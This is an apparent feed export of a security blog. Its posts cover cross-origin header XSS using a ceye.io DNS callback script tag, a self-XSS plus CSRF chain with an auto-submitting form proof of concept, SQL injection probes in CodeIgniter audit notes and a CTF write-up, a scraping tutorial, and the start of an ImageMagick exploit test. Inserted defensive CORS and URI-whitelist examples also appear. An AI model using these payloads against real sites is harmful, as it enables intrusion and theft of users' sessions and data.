echo urldecode($_SERVER['HTTP_X_FORWARDED_FOR']);
?></code></pre></figure></p>
<p>The local test HTML follows. X-Forwarded-For is set to <code><html><script src=http://x_for.xxxx.ceye.io></script></html></code>, and whether the tag is rendered is verified by checking CloudEye for a DNS request record.<br><figure class="highlight html"><pre><code><html>
<script>
var xmlhttp;
if (window.XMLHttpRequest)
  {// code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp=new XMLHttpRequest();
  }
else
  {// code for IE6, IE5
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.open("POST","http://taget.com/xss_test/cors.php",true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("X-Forwarded-For","%3Chtml%3E%3Cscript%20src%3Dhttp%3A%2f%2fx_for.xxxx.ceye.io%3E%3C%2fscript%3E%3C%2fhtml%3E"); // without this header it is a simple cross-origin request and no OPTIONS preflight is sent
xmlhttp.send('data=123');
</script>
</html></code></pre></figure></p>
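<p>The distinction between simple and preflighted requests, and the policy a server should apply instead of the permissive cors.php above, can be made concrete with a small decision function. The following JavaScript is an added example for this page, not code from the post: needsPreflight() classifies a request the way the browser does (method and header safelist from the Fetch standard, Content-Type compared by its media type with any charset parameter stripped), and corsResponseHeaders() computes the response headers for an explicit allowlist policy that echoes a single trusted origin rather than "*". The origin https://app.example and the EXAMPLE_POLICY values are constructed for the demonstration.</p>

```javascript
// Added example: simple-vs-preflight classification and an allowlist-based
// CORS decision. Not part of the original post; policy values are made up.

const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
// CORS-safelisted request headers (Fetch standard), compared case-insensitively.
const SAFELISTED_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
// Content-Type media types that keep a request "simple".
const SIMPLE_CONTENT_TYPES = new Set(['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain']);

// Lower-case header names so lookups are case-insensitive.
function lowerKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Would the browser send an OPTIONS preflight before this request?
function needsPreflight(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(lowerKeys(headers))) {
    if (!SAFELISTED_HEADERS.has(name)) return true;     // e.g. X-Forwarded-For
    if (name === 'content-type') {
      const essence = value.split(';')[0].trim().toLowerCase(); // drop "; charset=..."
      if (!SIMPLE_CONTENT_TYPES.has(essence)) return true;
    }
  }
  return false;
}

// CORS response headers for a request under an explicit policy, or null when
// the request must get no CORS headers at all (the browser then blocks it).
function corsResponseHeaders(req, policy) {
  const headers = lowerKeys(req.headers);
  const origin = headers['origin'];
  if (!origin || !policy.allowedOrigins.includes(origin)) return null;

  const out = {
    'Access-Control-Allow-Origin': origin, // echo the specific origin, never "*"
    'Vary': 'Origin',                       // caches must key on the Origin header
  };
  if (req.method.toUpperCase() === 'OPTIONS' && headers['access-control-request-method']) {
    // Preflight: every requested method and non-safelisted header must be allowed.
    const wantMethod = headers['access-control-request-method'].toUpperCase();
    if (!policy.allowedMethods.includes(wantMethod)) return null;
    const wantHeaders = (headers['access-control-request-headers'] || '')
      .split(',').map((h) => h.trim().toLowerCase()).filter(Boolean);
    for (const h of wantHeaders) {
      if (!SAFELISTED_HEADERS.has(h) && !policy.allowedHeaders.includes(h)) return null;
    }
    out['Access-Control-Allow-Methods'] = policy.allowedMethods.join(', ');
    out['Access-Control-Allow-Headers'] = policy.allowedHeaders.join(', ');
    out['Access-Control-Max-Age'] = String(policy.maxAgeSeconds);
  }
  return out;
}

// Constructed policy: only the first-party front end may call the endpoint and
// no custom request headers are permitted (header names kept lower-case).
const EXAMPLE_POLICY = {
  allowedOrigins: ['https://app.example'],
  allowedMethods: ['GET', 'POST'],
  allowedHeaders: ['content-type'],
  maxAgeSeconds: 600,
};
```

With this policy the form-encoded POST from the test page is still a simple request, the same POST carrying X-Forwarded-For requires a preflight, and that preflight is refused both because the origin is not on the allowlist and because X-Forwarded-For is not an allowed header. The allowlist is what cors.php lacks: "Access-Control-Allow-Origin: *" together with "Access-Control-Allow-Headers: X-Forwarded-For" lets any origin attach the very header the page reflects.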
<p>Opening the test page in Chrome, the AJAX request is sent successfully, and the Preview tab of that request shows that the HTML in the response appears to have been parsed.</p>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2VI8usXXXXXXgXpXXXXXXXXXX_!!792076116.png" alt="ajax"></p>
<p>The script tag's source is my CloudEye address, so let us see whether CloudEye has a DNS record:</p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2XvxKsXXXXXaYXXXXXXXXXXXX_!!792076116.png" alt="cloudeye"></p>
<p>The DNS request record is there, which shows that the browser parsed the HTML; at this point it looks as if header-based XSS can be triggered cross-origin. Further verification, however, showed that only the HTML is rendered: the JavaScript does not execute!!!</p>
<h3 id="0x04-self-xss"><a href="#0x04-self-xss" class="headerlink" title="0x04 self-xss"></a>0x04 self-xss</h3><p>Self-XSS is the weakest XSS of all: the attacker can only pop an alert in their own browser, and vendors generally ignore it. Combined with CSRF, however, it can produce unexpected results.</p>
<blockquote>
<p>Attack scenario: a site's personal-profile field has a self-XSS that does not fire on save but does fire when the profile is edited again. Both adding and editing the profile are vulnerable to CSRF.</p>
</blockquote>
<p>In this scenario one idea is to use the CSRF to insert the XSS code and then have the victim click or be redirected to trigger it. The victim is first given a link that performs the CSRF insertion of the XSS code:<br><figure class="highlight html"><pre><code><html>
  <body>
    <form id="csrf" name="csrf" method="POST" action="http://target.com/info/add">
      <input type="text" name="name" value="csrf_test#<script>alert(document.domain)</script>">
    </form>
    <script>
      document.getElementById("csrf").submit();
    </script>
  </body>
</html></code></pre></figure></p>
<p>Then lure the victim into clicking the link that triggers the vulnerability, <code>http://target.com/info/edit</code>, or send the redirect page below:<br><figure class="highlight html"><pre><code><html>
<script>
window.location.href="http://target.com/info/edit"
</script>
</html></code></pre></figure></p>
<p>Combined with CSRF, self-XSS turns from a weak finding into an exploitable vulnerability.</p>
<p>References:</p>
<p><a href="http://drops.wooyun.org/tips/188" target="_blank" rel="external">A detailed look at XMLHttpRequest cross-origin resource sharing</a></p>
<p><a href="http://zone.wooyun.org/content/11969" target="_blank" rel="external">Exploiting reflected XSS in the Referer header</a></p>
]]></content>
<summary type="html">
<h3 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 Preface"></a>0x01 Preface</h3><p>Compared with persistent XSS, reflected XSS is rather weak: the user has to be tricked into clicking a crafted link in order to steal cookies or, going further, to hijack the user's actions via CSRF. If it is a GET-based XSS, the JavaScript sits directly in the URL; a little odd-looking, but it at least works on whoever takes the bait.</p>
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="xss" scheme="http://wps2015.org/tags/xss/"/>
</entry>
<entry>
<title>Learning the CI framework, part 1 (input parameters / database operations)</title>
<link href="http://wps2015.org/2016/05/19/learning-of-CI1/"/>
<id>http://wps2015.org/2016/05/19/learning-of-CI1/</id>
<published>2016-05-18T16:00:00.000Z</published>
<updated>2016-05-28T02:00:44.878Z</updated>
<content type="html"><![CDATA[<p>For code auditing, the most important things to understand are how parameters are input and how the database is accessed. After reading the CI developer manual I put together the notes below.<br><a id="more"></a></p>
<h2 id="参数输入"><a href="#参数输入" class="headerlink" title="Input parameters"></a>Input parameters</h2><h4 id="1-CI自带输入类"><a href="#1-CI自带输入类" class="headerlink" title="1. CI's built-in Input class"></a>1. CI's built-in Input class</h4><p>The Input class serves two purposes:</p>
<blockquote>
<p>It pre-processes input data for security</p>
<p>It provides helper methods to fetch and process input data</p>
</blockquote>
<p>In CI, global XSS filtering can be enabled in /application/config/config.php</p>
<figure class="highlight plain"><pre><code>$config['global_xss_filtering'] = TRUE;</code></pre></figure>
<p>The most common calls are shown below. When the second parameter is TRUE, the xss_clean function is applied to filter the input parameter; it filters XSS only. xss_clean is defined in /system/core/Security.php and contains no corresponding countermeasure against SQL injection.<br><figure class="highlight php"><pre><code>$this->input->post($index[, $xss_clean = NULL])
$this->input->get()
$this->input->cookie()
$this->input->server()</code></pre></figure></p>
<p>Other, less commonly used ones include<br><figure class="highlight php"><pre><code>$this->input->get_post('some_data', TRUE); // looks in GET first, then POST
$this->input->post_get('some_data', TRUE);
$this->input->ip_address();
$this->input->user_agent();
$this->input->request_headers();
....</code></pre></figure></p>
<h4 id="2-URI-分段传递"><a href="#2-URI-分段传递" class="headerlink" title="2. Passing URI segments"></a>2. Passing URI segments</h4><p>When the URI has more than two segments, the extra segments are passed to your method as parameters. For example, with the URI<br><code>/index.php/news/view/test</code><br>the view method receives "test" as its parameter.<br><figure class="highlight php"><pre><code>public function view($slug = Null)
{
    $data['news'] = $this->news_model->get_news($slug);
    $data['title'] = "The detail news";

    if (empty($data['news']))
    {
        show_404();
    }
    $this->load->view('templates/header', $data);
    $this->load->view('news/index', $data);
    $this->load->view('templates/footer');
}</code></pre></figure></p>
<p>在/application/config/config.php中,定义了全局的URI参数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';</span><br></pre></td></tr></table></figure></p>
<p>开启后,可自定义允许的URI字符的白名单。利用这种方式传入的参数由于利用的是URI,不会被服务器urldecode,如果其他字符没有被过滤的话,可以用下面的语句测试是否注入: <code>(3)and(sleep(5))</code></p>
<h4 id="3-URI类方法获取"><a href="#3-URI类方法获取" class="headerlink" title="3. URI class methods"></a>3. URI class methods</h4><blockquote>
<p>The most commonly used call is:</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->uri->segment($n[, $no_result = NULL])</span><br></pre></td></tr></table></figure>
<p>It fetches a given segment from the URI. The parameter n is the number of the segment you want; segments are numbered from left to right. For example, if your full URL is<br><code>/index.php/news/view/test</code>, then counting index.php as 0, the code to get "test" is<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->uri->segment(<span class="number">3</span>)</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>Another handy method</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->uri->uri_to_assoc([$n = <span class="number">3</span>[, $default = <span class="keyword">array</span>()]])</span><br></pre></td></tr></table></figure>
<p>This method turns the URI segments into an associative array of key/value pairs. The first parameter is the offset, default 3 (the first two segments are the controller and the method). For the URI <code>index.php/user/search/cid/1/sid/2</code> it yields<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span> (size=<span class="number">2</span>)</span><br><span class="line"> <span class="string">'cid'</span> => string <span class="string">'1'</span> (length=<span class="number">1</span>)</span><br><span class="line"> <span class="string">'sid'</span> => string <span class="string">'2'</span> (length=<span class="number">1</span>)</span><br></pre></td></tr></table></figure></p>
<p>Parameters fetched this way are also subject to permitted_uri_chars.</p>
<h4 id="4-典型的PHP方法"><a href="#4-典型的PHP方法" class="headerlink" title="4. Typical PHP methods"></a>4. Typical PHP methods</h4><p>The ones everyone knows best: <code>$_GET[], $_POST[]</code> and so on.</p>
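<p>To show what <code>permitted_uri_chars</code> does and does not let through for the URI-segment and URI-class parameters above, here is an added Python example that is not CodeIgniter's own code: it re-implements the whitelist check the way the URI class applies it (the config value becomes a character class inside <code>^[...]+$</code>, matched case-insensitively per segment; a simplified assumption about CI's implementation) together with a minimal model of <code>uri_to_assoc()</code>, so the URIs discussed above can be traced through.</p>

```python
import re

# Default value as quoted on this page (application/config/config.php)
DEFAULT_PERMITTED_URI_CHARS = r"a-z 0-9~%.:_\-"
# A loosened whitelist, constructed for this example, that also admits ( and )
LOOSENED_PERMITTED_URI_CHARS = r"a-z 0-9~%.:_\-()"


def segment_allowed(segment, permitted=DEFAULT_PERMITTED_URI_CHARS):
    """True if every character of one URI segment is in the whitelist.

    Simplified re-implementation (assumption) of CodeIgniter's filter_uri():
    the config string is used verbatim as a regex character class and the
    match is case-insensitive. An empty whitelist means "allow everything".
    """
    if not permitted or segment == "":
        return True
    pattern = r"^[" + permitted + r"]+$"
    return re.match(pattern, segment, re.IGNORECASE) is not None


def check_uri(path, permitted=DEFAULT_PERMITTED_URI_CHARS):
    """Split a CI-style path into segments (dropping index.php and empty
    parts) and return (segments, first_rejected_segment_or_None)."""
    segments = [s for s in path.split("/") if s and s != "index.php"]
    for seg in segments:
        if not segment_allowed(seg, permitted):
            return segments, seg
    return segments, None


def uri_to_assoc(segments, n=3):
    """Minimal model of $this->uri->uri_to_assoc($n): starting at segment n
    (1-based, so 3 skips controller and method), pair up key/value segments.
    A trailing key without a value maps to None here (assumption)."""
    rest = segments[n - 1:]
    return {rest[i]: (rest[i + 1] if i + 1 < len(rest) else None)
            for i in range(0, len(rest), 2)}


if __name__ == "__main__":
    # The page's news/view/test example passes untouched
    print(check_uri("/index.php/news/view/test"))
    # The injection probe quoted on the page is rejected by the default
    # whitelist, because ( and ) are not in it
    print(check_uri("/index.php/news/view/(3)and(sleep(5))"))
    # ...and reaches the controller unchanged once the whitelist is loosened,
    # which is why the probe only works when the configured set is too wide
    print(check_uri("/index.php/news/view/(3)and(sleep(5))",
                    LOOSENED_PERMITTED_URI_CHARS))
    # The uri_to_assoc example from the page
    segs, _ = check_uri("index.php/user/search/cid/1/sid/2")
    print(uri_to_assoc(segs))
```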
<h2 id="数据库操作"><a href="#数据库操作" class="headerlink" title="Database operations"></a>Database operations</h2><h4 id="1-基本查询"><a href="#1-基本查询" class="headerlink" title="1. Basic queries"></a>1. Basic queries</h4><p>CI provides a database class library, which has to be loaded manually (unless it is autoloaded in autoload.php)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->load->database()</span><br></pre></td></tr></table></figure></p>
<p>Once loaded, the built-in methods can be called directly as <code>$this->db->function</code>.</p>
<blockquote>
<p>Regular query, query($sql)</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->db->query("select * from news where id = '".$id."'")</span><br></pre></td></tr></table></figure>
<p>Even with single quotes added, passing the variable straight in is still unsafe. Use the escape() method instead: it escapes the value and adds the single quotes itself.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->db->query("select * from news where id = ".$this->db->escape($id))</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>Parameter binding</p>
</blockquote>
<p>Parameter binding escapes the bound values automatically and produces a safe query<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$sql = "SELECT * FROM some_table WHERE id = ? AND status = ? AND author = ?";</span><br><span class="line">$this->db->query($sql, array(3, 'live', 'Rick')); // pass an indexed array</span><br></pre></td></tr></table></figure></p>
<h4 id="2-查询构造器"><a href="#2-查询构造器" class="headerlink" title="2. Query Builder"></a>2. Query Builder</h4><p>CodeIgniter provides a Query Builder class that lets you fetch, insert or update data with less code; sometimes one or two lines are enough. All builder methods are defined in /system/database/DB_query_builder.php.<br>The most commonly used ones:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$this->db->get($table, $limit1, $limit2) <span class="comment">// select * from $table limit $limit1, $limit2</span></span><br><span class="line">$this->db->get_where(<span class="string">'mytable'</span>, <span class="keyword">array</span>(<span class="string">'id'</span> => $id), $limit, $offset); <span class="comment">// select * from mytable where id = $id limit $limit, $offset</span></span><br><span class="line">$this->db->insert(<span class="string">'mytable'</span>, $data); <span class="comment">// $data is an array</span></span><br><span class="line">$this->db->update(<span class="string">'mytable'</span>, $data) <span class="comment">// set the condition with the where() call below</span></span><br><span class="line">$this->db->delete(<span class="string">'mytable'</span>, <span class="keyword">array</span>(<span class="string">'id'</span> => $id)); <span class="comment">// the second argument can also be replaced by a where() call</span></span><br></pre></td></tr></table></figure></p>
<p>Parts of the SQL statement are written with these companion methods<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$this->db->select(<span class="string">'title, content, date'</span>); <span class="comment">// fields to select</span></span><br><span class="line">$this->db->where(<span class="keyword">array</span>(<span class="string">'name'</span> => $name, <span class="string">'title'</span> => $title, <span class="string">'status'</span> => $status)); <span class="comment">// query conditions</span></span><br><span class="line">$this->db->like(<span class="string">'title'</span>, <span class="string">'match'</span>); <span class="comment">// where `title` like '%match%'</span></span><br><span class="line">$this->db->order_by(<span class="string">'title'</span>, <span class="string">'DESC'</span>);</span><br><span class="line">$this->db->limit(<span class="number">10</span>, <span class="number">20</span>);</span><br><span class="line">.....</span><br></pre></td></tr></table></figure></p>
<h4 id="3-经典的php语句"><a href="#3-经典的php语句" class="headerlink" title="3. Classic PHP statements"></a>3. Classic PHP statements</h4><p>PHP's mysql extension functions.</p>
<p>References:</p>
<p><a href="http://codeigniter.org.cn/" target="_blank" rel="external">CodeIgniter User Guide</a></p>
]]></content>
<summary type="html">
<p>For code auditing, the most important things to understand are how parameters come in and how the database is accessed. After reading the CI developer manual, I put together the notes below.<br>
</summary>
<category term="代码审计" scheme="http://wps2015.org/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="编程" scheme="http://wps2015.org/tags/%E7%BC%96%E7%A8%8B/"/>
</entry>
<entry>
<title>whctf2016 preliminary round writeup (web&crypto)</title>
<link href="http://wps2015.org/2016/05/15/whctf-writeup-all/"/>
<id>http://wps2015.org/2016/05/15/whctf-writeup-all/</id>
<published>2016-05-14T16:00:00.000Z</published>
<updated>2016-12-23T02:21:48.128Z</updated>
<content type="html"><![CDATA[<p>The whctf2016 preliminary round ended early; the team did well, solving all of the web challenges and almost all (one short) of the crypto challenges.<a id="more"></a></p>
<h2 id="Web题"><a href="#Web题" class="headerlink" title="Web challenges"></a>Web challenges</h2><p><strong>0x01. Information</strong></p>
<p>The page is a download link for a cap file captured with wireshark. Analysing it shows two HTTP packets; the GET request downloads a zip archive, which can be exported from wireshark via File - Export Objects - HTTP. The archive is password protected; the official hint points to the HUST website, so the password is <code>www.hust.edu.cn</code>. The flag is in flag3.docx</p>
<p><strong>0x02. Theft</strong></p>
<p>The test address has a union-based injection. sqlmap finds the flag hint in the <strong>wh_ct4_hgduyingjkhjhjg</strong> database: <code>flag is nothere,but I can tell you the flag is xor user's password.</code>. So in the <strong>web_sqli</strong> database, XOR the passwords of user1 and user2 and decode the result to get the flag: hust</p>
<p><strong>0x03. Forgot the username and password</strong></p>
<p>username: <code>' union select 1,2,3-- -</code> , three columns</p>
<p>password: anything</p>
<p><strong>0x04. find</strong></p>
<p>View the page source and find<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">css/[adwxhyz]{2}ctf[0-9]{7}.css"</span><br></pre></td></tr></table></figure></p>
<p>A regex: two letters followed by seven digits. A bold guess makes the first two "wh"; the last seven waited for the official hint (), a QQ number. Looking up that QQ profile gives a birthday of 12 May 1999; css/whctf1999512.css works and the flag is inside: <code>whctf{Wh3tF_H@rd}</code></p>
<p><strong>0x05. beat it</strong></p>
<p>Again a pcap download, containing three IPv4 packets. Reassemble them, dropping the middle one, concatenate the data and hex-decode it twice into a string to get the flag <code>whctf{000 here it is the flag 000}</code></p>
<p><strong>0x06. What if I forgot my password?</strong></p>
<p>SQL injection at the login form, union-based again. The injection reveals a flag column in the user table; combining the flag field of rows 12, 13, 14 and 15 gives<br><code>whctf{hello$$##itisme&---&&&}</code></p>
<p><strong>0x07. Picture talk</strong></p>
<p>The hint mentions the ctf page script, so guess that ctf.php exists. It is a 302 redirect, and the response carries an image link<br><code>templates/images/xxx/ctf.jpg</code><br>. Download the image and open it in notepad++; the flag is at the end: <code>whctf{today@@isnot09#$tomorrow}</code></p>
<h2 id="CRYPTO题"><a href="#CRYPTO题" class="headerlink" title="CRYPTO challenges"></a>CRYPTO challenges</h2><p><strong>0x01 My name is Li Ergou (1)</strong><br>Decode the base64 directly. Then, since Li Ergou is near-sighted, replace l with 1, x with 1 and o with 0; decoding shows it is the left16 scheme.</p>
<p><strong>0x02 Li Ergou's dream girl</strong><br>Extract the image from the link hidden at the end of the picture, convert it to png with convert, run diffimg on it to get a QR code, invert black and white to get the correct QR code, scan it, bingo</p>
<p><strong>0x03 My name is Li Ergou (2)</strong><br>Two RSA ciphertexts are given; because the public key is weak (N too small), factor N directly and decrypt</p>
<p><strong>0x04 Li Ergou's LOL battle song</strong><br>Listening to the audio, the right channel sounds like telegraph; translating it into Morse code gives 13 characters, and applying ROT13 gives the flag</p>
]]></content>
<summary type="html">
<p>The whctf2016 preliminary round ended early; the team did well, solving all of the web challenges and almost all (one short) of the crypto challenges.
</summary>
<category term="CTF" scheme="http://wps2015.org/categories/CTF/"/>
<category term="ctf" scheme="http://wps2015.org/tags/ctf/"/>
</entry>
<entry>
<title>Fetching JS-rendered results with phantomjs+selenium</title>
<link href="http://wps2015.org/2016/05/12/Using-phantomjs%20+%20selenium-fetching-js-result-of-execution/"/>
<id>http://wps2015.org/2016/05/12/Using-phantomjs + selenium-fetching-js-result-of-execution/</id>
<published>2016-05-12T02:29:30.603Z</published>
<updated>2016-11-08T01:46:28.707Z</updated>
<content type="html"><![CDATA[<p>0x01 The requirement<br>I needed to write an interface that fetches a site's score and vulnerability status from 360webscan, and assumed a simple crawler would do. After fetching the page I was stumped. First look at where the score comes from<a id="more"></a><br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$.ajax({ </span><br><span class="line"></span><br><span class="line"> url : <span class="string">"/webscore/index"</span>,</span><br><span class="line"></span><br><span class="line"> type: <span class="string">'POST'</span>,</span><br><span class="line"></span><br><span class="line"> dataType: <span class="string">'json'</span>,</span><br><span class="line"></span><br><span class="line"> data:<span class="string">'isxujia='</span>+isxujia+<span class="string">'&iscuangai='</span>+iscuangai+<span class="string">'&isviolation='</span>+isviolation+<span class="string">'&isguama='</span>+isguama+<span class="string">'&high='</span>+high+<span class="string">'&mid='</span>+mid+<span class="string">'&low='</span>+low+<span class="string">'&info='</span>+info+<span class="string">'&domain=www.natco.top&pangzhu='</span>+pangzhu,</span><br><span class="line"></span><br><span class="line"> success: <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</span><br></pre></td></tr></table></figure></p>
<p>This ajax request posts the url together with parameters such as isxujia (is-fake) to the server and gets the score back. So where do isxujia and the others come from? Look further up<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">$.ajax({</span><br><span class="line"></span><br><span class="line"> url: <span class="string">"/index/gettrojan"</span>,</span><br><span class="line"></span><br><span class="line"> type:<span class="string">"POST"</span>,</span><br><span class="line"></span><br><span class="line"> dataType:<span class="string">"json"</span>,</span><br><span class="line"></span><br><span class="line"> data:<span class="string">"url="</span>+url+<span class="string">"&token=34e08ea449361738107148de883678c4&time=1462934864"</span>,</span><br><span class="line"></span><br><span class="line"> success: <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{ </span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> type = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> st = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> sc = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> ssc = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> trojan_list = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> isxujia = <span class="number">0</span>;</span><br></pre></td></tr></table></figure></p>
<p>In short, the type, st and other values returned by this ajax request (which carries a token) go through some conditions that decide whether isxujia is 1. Because of the token, there is no way to reproduce that computation myself in python. What remains is to capture the page values after the JS has rendered; the most mature approach found online is phantomjs+selenium.</p>
<hr>
<p>0x02 Environment setup<br><strong>Selenium</strong> is a tool for testing web applications. Selenium tests run directly in the browser, as if a real user were operating it. Supported browsers include IE, Mozilla Firefox, Chrome and others.<br><strong>Phantom JS</strong> is a server-side WebKit with a JavaScript API. It supports the usual web standards: DOM handling, CSS selectors, JSON, Canvas and SVG.<br>On kali2.0, first install Selenium: <code>sudo apt-get install selenium</code><br>Then install Phantom JS from the official download page: <a href="http://phantomjs.org/download.html" target="_blank" rel="external">link</a>. Download the build for your system and set it up<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cd /usr/local/share</span><br><span class="line">sudo wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2</span><br><span class="line">sudo tar -xvf phantomjs-2.1.1-linux-x86_64.tar.bz2</span><br><span class="line">sudo ln -s /usr/local/share/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs</span><br><span class="line">sudo ln -s /usr/local/share/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs</span><br><span class="line">sudo ln -s /usr/local/share/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /usr/bin/phantomjs</span><br></pre></td></tr></table></figure></p>
<p>0x03 demo<br>Here the phantomjs executable path is '/usr/bin/phantomjs'; below is a small demo<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> selenium <span class="keyword">import</span> webdriver</span><br><span class="line"></span><br><span class="line">driver = webdriver.PhantomJS(executable_path=<span class="string">'/usr/bin/phantomjs'</span>) <span class="comment"># note the executable path</span></span><br><span class="line">driver.get(<span class="string">"http://phperz.com/"</span>)</span><br><span class="line">driver.find_element_by_id(<span class="string">'search_form_input_homepage'</span>).send_keys(<span class="string">'Nirvana'</span>)</span><br><span class="line">driver.find_element_by_id(<span class="string">"search_button_homepage"</span>).click()</span><br><span class="line"><span class="keyword">print</span> driver.current_url</span><br><span class="line">driver.quit() <span class="comment"># remember to quit the driver</span></span><br></pre></td></tr></table></figure></p>
<p>The key is using selenium to read the values of DOM nodes after the JS has rendered them.</p>
<p>References:<br><a href="http://ohroot.com/2014/11/11/phantomjs%E5%B0%8F%E8%AF%95%E7%89%9B%E5%88%80/" target="_blank" rel="external">http://ohroot.com/2014/11/11/phantomjs%E5%B0%8F%E8%AF%95%E7%89%9B%E5%88%80/</a></p>
]]></content>
<summary type="html">
<p>0x01 The requirement<br>I needed to write an interface that fetches a site's score and vulnerability status from 360webscan, and assumed a simple crawler would do. After fetching the page I was stumped. First look at where the score comes from
</summary>
<category term="编程之美" scheme="http://wps2015.org/categories/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>ImageMagick vulnerability test</title>
<link href="http://wps2015.org/2016/05/12/test-of-ImageMagick%7F/"/>
<id>http://wps2015.org/2016/05/12/test-of-ImageMagick/</id>
<published>2016-05-11T16:00:00.000Z</published>
<updated>2016-11-08T01:44:57.891Z</updated>
<content type="html"><![CDATA[<p>  On 3 May a severe 0day (CVE-2016-3714) was disclosed in the image processing software ImageMagick; through it an attacker can execute arbitrary commands, ultimately stealing sensitive information and taking control of the server.<a id="more"></a>The impact is wide: ImageMagick is supported by many languages, including Perl, C++, PHP (via the imagick extension), Python and Ruby, and is deployed on millions of websites, blogs, social media platforms and popular content management systems (CMS) such as WordPress and Drupal.<br>  Exploiting the flaw, an uploaded image containing malicious code leads to command execution. The focus here is on how to test for the vulnerability: writing files, reverse shells, wget and so on. A local test environment was set up on kali2.0 with LAMP and the PHP imagick extension, calling ImageMagick to process uploaded images<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 